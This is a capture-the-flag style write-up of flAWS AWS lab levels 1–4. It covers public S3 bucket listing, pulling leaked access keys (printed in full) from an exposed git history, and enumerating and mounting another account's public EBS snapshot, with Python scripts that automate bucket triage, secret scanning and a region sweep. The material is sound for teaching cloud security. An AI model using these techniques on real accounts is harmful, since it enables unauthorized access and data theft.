CSbyGB - Pentips
flAWS 1&2


Last updated 1 year ago

These labs (flAWS, hosted at flaws.cloud, and its follow-up flAWS2) are a great introduction to AWS pentesting. This page covers the first four levels of flAWS 1.

flAWS 1

Level 1

The first task is to find the first sub-domain.

  • Let's run dig on flaws.cloud first to get the IP addresses behind the name.

  • Now we can run nslookup on one of those IP addresses: the reverse name ends in s3-website-us-west-2.amazonaws.com, so the site is a static website served straight out of an S3 bucket in us-west-2.

An S3 website endpoint only serves a bucket whose name matches the host name, so the bucket has to be called flaws.cloud. We now have enough details to list it with the AWS CLI: aws s3 ls s3://flaws.cloud --no-sign-request --region us-west-2. Here we are doing an ls on the bucket, --no-sign-request makes the request anonymous (the bucket allows public listing, which is the misconfiguration of this level), and we specify the region the reverse lookup gave us. The listing contains a secret html file, and opening it leads to the next level.
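As an added example (my code, not part of the original page or of flAWS), here is the check the two DNS steps above boil down to: recognise an S3 endpoint in a dig/nslookup answer, pull the region out of it, and build the anonymous listing command. It goes a bit beyond the lab by also handling the dotted website form used by newer regions and the bucket.s3.<region> REST form. The answers in SAMPLE_ANSWERS are constructed (only the flaws.cloud entry is shaped like the real reverse lookup), and identify_s3_host, no_sign_listing and triage are names chosen for this example.

```python
import re

# Hostnames AWS uses for S3 endpoints. Both the dashed website form
# (s3-website-us-west-2, older regions) and the dotted form
# (s3-website.eu-west-3, newer regions) exist; the REST forms
# bucket.s3.<region> and bucket.s3-<region> fit the same pattern.
# The legacy global endpoint s3.amazonaws.com carries no region and is
# deliberately not matched: it would not tell us where the bucket lives.
_S3_HOST = re.compile(
    r"^(?:(?P<bucket>.+)\.)?"                   # optional bucket label(s)
    r"s3(?:-website)?[-.]"                      # s3-website-<region> / s3.<region>
    r"(?P<region>[a-z]{2}(?:-[a-z]+)+-\d)"      # us-west-2, ap-southeast-1, us-gov-west-1
    r"\.amazonaws\.com\.?$"
)


def identify_s3_host(domain, dns_name):
    """Return (bucket, region) when dns_name is an S3 endpoint, else None.

    dns_name is what dig/nslookup gave for `domain`: either a CNAME target or
    the PTR name of one of its A records. An S3 website endpoint only serves a
    bucket whose name equals the Host header, so when the answer carries no
    bucket label (the PTR case, as with flaws.cloud) the bucket is the domain.
    """
    m = _S3_HOST.match(dns_name.strip().lower())
    if not m:
        return None
    bucket = m.group("bucket") or domain.strip().lower().rstrip(".")
    return bucket, m.group("region")


def no_sign_listing(bucket, region):
    """The anonymous listing from level 1. It only succeeds when the bucket
    policy or ACL grants s3:ListBucket to everyone; an AccessDenied here
    means trying an authenticated profile next (level 2)."""
    return f"aws s3 ls s3://{bucket} --no-sign-request --region {region}"


# Constructed sample answers modelled on dig/nslookup output. Only the
# flaws.cloud PTR name is shaped like what the lab returns; the example.org
# entries are made up for illustration.
SAMPLE_ANSWERS = {
    "flaws.cloud": "s3-website-us-west-2.amazonaws.com.",                         # PTR of an A record
    "static.example.org": "static.example.org.s3-website.eu-west-3.amazonaws.com.",  # CNAME
    "www.example.org": "ec2-203-0-113-7.eu-west-3.compute.amazonaws.com.",        # EC2, not S3
}


def triage(answers=SAMPLE_ANSWERS):
    """Map each domain to the next command worth running, or None."""
    result = {}
    for domain, name in answers.items():
        hit = identify_s3_host(domain, name)
        result[domain] = no_sign_listing(*hit) if hit else None
    return result


if __name__ == "__main__":
    for domain, cmd in triage().items():
        print(f"{domain}: {cmd or 'not an S3 endpoint'}")
```

Run it as-is to see the triage of the constructed answers; in an engagement, feed it the CNAME targets and PTR names you collected for each host.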

Level 2

Let's check the bucket, but this time with our own (authenticated) user: aws s3 --profile gabrielle ls s3://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud. The profile can belong to any AWS account of ours: the bucket is no longer public, but it grants listing to every authenticated AWS user, which is barely better.

Once again the listing contains a secret html file, and opening it takes us to level 3.

Level 3

Let's try to ls the bucket s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/

We can see a .git folder. This is definitely something I would look into in a web pentest, so let's explore it.

Let's take the full git folder with aws s3 sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git/ --profile gabrielle .

The commit message is promising: it says something was added by mistake, so the earlier commit is worth a look.

OK, in order to be able to use git diff we need to get the full thing: aws s3 sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/ --profile gabrielle . (the first sync copied the contents of .git/ straight into the current directory; this one lays the repository out with a proper .git directory, which is why the git commands work afterwards).

Here is what we get with git diff.

Here is some exploration we can do with git (git log and git status).

And using GitTools' extractor (if we want to go faster) we can find the access keys!! :D
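Added example (my code, not flAWS's nor the page's) of what the git diff / git log exploration and GitTools' extractor are looking for, as a small scanner over `git log -p --all` output. It reports in which commit an AWS key was added and in which it was removed, which matters because a deleted key stays valid until it is rotated. SAMPLE_LOG is a constructed history shaped like this level's (keys file committed, then deleted) using AWS's documented example key pair rather than real credentials; git_log_patch runs the real git command when you point it at a repository, and only the .git directory is needed for that.

```python
import re
import subprocess

# AWS access key IDs are 20 characters: AKIA (long-term user keys) or ASIA
# (temporary STS keys) followed by 16 upper-case alphanumerics.
AKID_RE = re.compile(r"\b((?:AKIA|ASIA)[0-9A-Z]{16})\b")
# A secret access key is 40 characters of [A-Za-z0-9/+]. On its own that
# matches far too much, so require a "secret ... key" label within a few
# characters in front of it, which is how such files are usually written.
SECRET_RE = re.compile(
    r"(?i)secret[_\- ]?(?:access[_\- ]?)?key\W{0,5}([A-Za-z0-9/+]{40})(?![A-Za-z0-9/+=])"
)
COMMIT_RE = re.compile(r"^commit ([0-9a-f]{7,40})\b")


def git_log_patch(repo_dir):
    """Run `git log -p --all` on a repository. Only the .git directory is
    needed for this: git log reads objects, not the working tree."""
    return subprocess.run(
        ["git", "-C", repo_dir, "log", "-p", "--all"],
        capture_output=True, text=True, check=True,
    ).stdout


def scan_git_log(log_text):
    """Scan `git log -p` text. Every '+' or '-' diff line is checked, so a
    key that a later commit deleted still shows up (as a '-' line in the
    commit that removed it). Returns a list of finding dicts."""
    findings = []
    commit = None
    for line in log_text.splitlines():
        m = COMMIT_RE.match(line)
        if m:
            commit = m.group(1)
            continue
        if not line or line[0] not in "+-" or line.startswith(("+++", "---")):
            continue                      # not a changed line (or a file header)
        action = "added" if line[0] == "+" else "removed"
        for kind, pattern in (("access_key_id", AKID_RE), ("secret_access_key", SECRET_RE)):
            for value in pattern.findall(line):
                findings.append({"commit": commit, "action": action,
                                 "kind": kind, "value": value})
    return findings


def summarize(findings):
    """Group findings per credential: which commits introduced it and which
    removed it. A removed-but-never-rotated secret is still live."""
    summary = {}
    for f in findings:
        entry = summary.setdefault(f["value"], {"kind": f["kind"], "added": [], "removed": []})
        entry[f["action"]].append(f["commit"])
    return summary


# Constructed sample of `git log -p` output (newest commit first), shaped like
# the level 3 history: a keys file committed, then deleted in the next commit.
# Hashes, author and dates are made up; the key pair is AWS's documented example.
SAMPLE_LOG = """\
commit a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0
Author: someone <someone@example.org>
Date:   Mon Sep 18 13:20:00 2017 -0700

    Oops, remove the keys

diff --git a/access_keys.txt b/access_keys.txt
deleted file mode 100644
--- a/access_keys.txt
+++ /dev/null
@@ -1,2 +0,0 @@
-access_key AKIAIOSFODNN7EXAMPLE
-secret_access_key wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY

commit 0123456789abcdef0123456789abcdef01234567
Author: someone <someone@example.org>
Date:   Mon Sep 18 13:10:00 2017 -0700

    first commit

diff --git a/access_keys.txt b/access_keys.txt
new file mode 100644
--- /dev/null
+++ b/access_keys.txt
@@ -0,0 +1,2 @@
+access_key AKIAIOSFODNN7EXAMPLE
+secret_access_key wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
"""


if __name__ == "__main__":
    import sys
    text = git_log_patch(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_LOG
    for value, info in summarize(scan_git_log(text)).items():
        print(f"{info['kind']}: {value}  added in {info['added']}  removed in {info['removed']}")
```

Without an argument it scans the constructed history; pass the directory you synced the bucket into (`python3 scan.py .`) to scan the real one. The label requirement on SECRET_RE keeps noise down but will miss secrets stored under an unrelated variable name, so widen it when the repository uses its own conventions.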

The access keys found in the history (these are the credentials flAWS leaks on purpose for this level):

access_key AKIAJ366LIPB4IJKT7SA
secret_access_key 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

Now we need to configure a new profile with these creds (aws configure --profile flaws).

Now we just need to list the buckets visible to our new profile: aws --profile flaws s3 ls

We can now access the next level using the url http://level4-1156739cfb264ced6de514971a4bef68.flaws.cloud/

Level 4

When accessing the provided link we are prompted for credentials.

The big hint we had here is that a snapshot was made of the EC2 instance behind the site. Maybe it is publicly accessible (EBS snapshots can be shared with specific accounts or with everyone).

Let's list the snapshots for our profile: aws --profile flaws ec2 describe-snapshots

This returned a lot of results. Turns out that, without an owner filter, these are all the publicly accessible snapshots in the region...

We need to check the account ID of our new profile (sts get-caller-identity returns it).

Now we can specify the owner ID in order to get only that account's snapshots.

Here is what I got for a snapshot. Not really satisfying: the list is empty.

I had to use the hint because I was stuck here, and I realized that we needed to specify another region than the one I had configured. EC2 resources are regional, so describe-snapshots only returns the region it is sent to; without the hint, the way to find the right one is to try every region (aws ec2 describe-regions lists them), starting with us-west-2 since that is where the buckets of the earlier levels live. So we can either reconfigure our profile with the region us-west-2 or specify the region in the command that lists the snapshots, like this: aws --profile flaws ec2 describe-snapshots --owner-ids 975426262029 --region us-west-2 (note the flag is --owner-ids, plural). I just reconfigured my profile, and it worked: we got the snapshot description below.
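Added example (not from the page or from flAWS) of the sweep the author needed a hint for: ask describe-snapshots for the owner account in every region, because the API is regional. list_owned_snapshots takes a client factory so it can run offline against FakeEC2, a constructed stand-in that places this level's snapshot (owner 975426262029, snap-0b49342abd1bdcb89) in us-west-2, spreads it over two pages, and makes one region reject the call; main is the live version with boto3 and the profile name flaws, taking the account ID from sts get-caller-identity and the region list from describe-regions. boto3 being installed and that profile existing are assumptions.

```python
def list_owned_snapshots(ec2_for_region, owner_id, regions):
    """Query every region for EBS snapshots owned by owner_id.

    ec2_for_region(region) must return an object with a boto3-style
    describe_snapshots(OwnerIds=[...], NextToken=...) method. Returns
    ({region: [snapshot_id, ...]}, {region: error_message}); regions with
    no snapshots are left out of the first dict.
    """
    found, errors = {}, {}
    for region in regions:
        try:
            client = ec2_for_region(region)
            kwargs = {"OwnerIds": [owner_id]}
            ids = []
            while True:                          # follow NextToken pagination
                resp = client.describe_snapshots(**kwargs)
                ids.extend(s["SnapshotId"] for s in resp.get("Snapshots", []))
                token = resp.get("NextToken")
                if not token:
                    break
                kwargs["NextToken"] = token
        except Exception as exc:                 # e.g. region not opted in, no rights
            errors[region] = f"{type(exc).__name__}: {exc}"
            continue
        if ids:
            found[region] = ids
    return found, errors


class FakeEC2:
    """Constructed stand-in for boto3's EC2 client, for the offline demo.
    One snapshot exists in us-west-2 (the IDs are the ones from this level),
    other regions are empty and eu-north-1 rejects the call."""

    def __init__(self, region):
        self.region = region

    def describe_snapshots(self, OwnerIds, NextToken=None):
        if self.region == "eu-north-1":
            raise PermissionError("UnauthorizedOperation")
        if self.region == "us-west-2" and OwnerIds == ["975426262029"]:
            if NextToken is None:                # first page, more to come
                return {"Snapshots": [{"SnapshotId": "snap-0b49342abd1bdcb89"}],
                        "NextToken": "page2"}
            return {"Snapshots": []}             # last, empty page
        return {"Snapshots": []}


def demo():
    """Offline run over a few regions using the fake client."""
    regions = ["us-east-1", "us-west-2", "eu-west-1", "eu-north-1"]
    return list_owned_snapshots(FakeEC2, "975426262029", regions)


def main(profile="flaws"):
    """Live run against AWS with the level 3 keys configured under `profile`.
    Needs boto3; the account id comes from STS, the region list from EC2."""
    import boto3
    session = boto3.Session(profile_name=profile)
    owner = session.client("sts").get_caller_identity()["Account"]
    ec2 = session.client("ec2", region_name="us-east-1")
    regions = [r["RegionName"] for r in ec2.describe_regions()["Regions"]]
    return list_owned_snapshots(
        lambda r: session.client("ec2", region_name=r), owner, regions)


if __name__ == "__main__":
    found, errors = demo()
    for region, ids in found.items():
        print(region, ids)
    for region, err in errors.items():
        print(region, "skipped:", err)
```

Swap demo() for main() in the last block to run it against the lab; the same loop is how you would check any set of leaked keys for snapshots (or AMIs, with describe_images) left in a region nobody looks at.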

Apparently we will need to mount the snapshot in our own AWS account: create a volume from the snapshot in our account (same region, in one of its availability zones), attach it to an EC2 instance and mount it from there.

aws --profile gabrielle ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-0b49342abd1bdcb89

I personally had a few issues because my settings were for another region, and so to modify permissions I had to delete my current region to move it to another one. Long story short, I stopped here for this challenge.

However, if you have the same problem and don't want to create another account or delete your current settings, I really recommend that you read the writeup; it is really interesting.

Executeatwill's writeup is really good, but there are a few others available online.

Notes

Level 1: if we open the html file found in the listing, we end up on the page for level 2.

Level 2: I literally pulled my hair out here xD. I got an access denied (An error occurred (AccessDenied) when calling the ListObjectsV2 operation: Access Denied) even with my own user. What solved the problem was adding that user to a group that grants S3 permissions: the bucket allows any authenticated AWS user, but the IAM principal on our side still needs s3:ListBucket for the request to go through. Once I had done this I ran the command again and got the listing.

Level 4: now we need to create an EC2 instance in the same availability zone as the volume, attach the volume and mount it. I can only recommend that you check out executeatwill's writeup for this step. You can also find it in the AWS chapter of my pentips.

Resources
  • Flaws.Cloud Walkthrough Level 1 by Marc Lopez on YouTube
  • Flaws.Cloud Walkthrough Level 2 by Marc Lopez on YouTube
  • Flaws.Cloud Walkthrough Level 3 by Marc Lopez on YouTube
  • Flaws.Cloud Walkthrough Level 4 by Marc Lopez on YouTube
  • A Beginner's Guide To Exploiting AWS Misconfigurations | Flaws.Cloud Full Walkthrough by Cyberwox
  • Flaws.cloud Walkthrough by Executeatwill
  • Hacking AWS - Flaws.Cloud Walkthrough by Phil Keeble